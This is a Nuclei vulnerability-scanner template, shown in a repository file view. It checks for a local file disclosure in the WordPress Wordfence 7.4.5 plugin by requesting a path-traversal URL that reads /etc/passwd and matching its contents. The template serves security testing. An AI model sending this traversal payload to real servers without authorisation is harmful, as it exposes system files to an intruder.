Files
nuclei-templates/vulnerabilities/wordpress/wordpress-wordfence-lfi.yaml
forgedhallpass cdf9451158 Removed pipe (|) character from references, because the structure requires it to be a string slice, not a string
Related nuclei tickets:
* #259 - dynamic key-value field support for template information
* #940 - new infos in template
* #834
* RES-84
2021-08-18 14:44:27 +03:00

26 lines
657 B
YAML

id: wordpress-wordfence-lfi
info:
name: Wordpress Plugin wordfence.7.4.5 - Local File Disclosure
author: 0x_Akoko
severity: high
reference:
- https://www.exploit-db.com/exploits/48061
- https://www.nmmapper.com/st/exploitdetails/48061/42367/wordpress-plugin-wordfence745-local-file-disclosure/
tags: wordpress,wp-plugin,lfi,wordfence
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/wordfence/lib/wordfenceClass.php?file=/../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200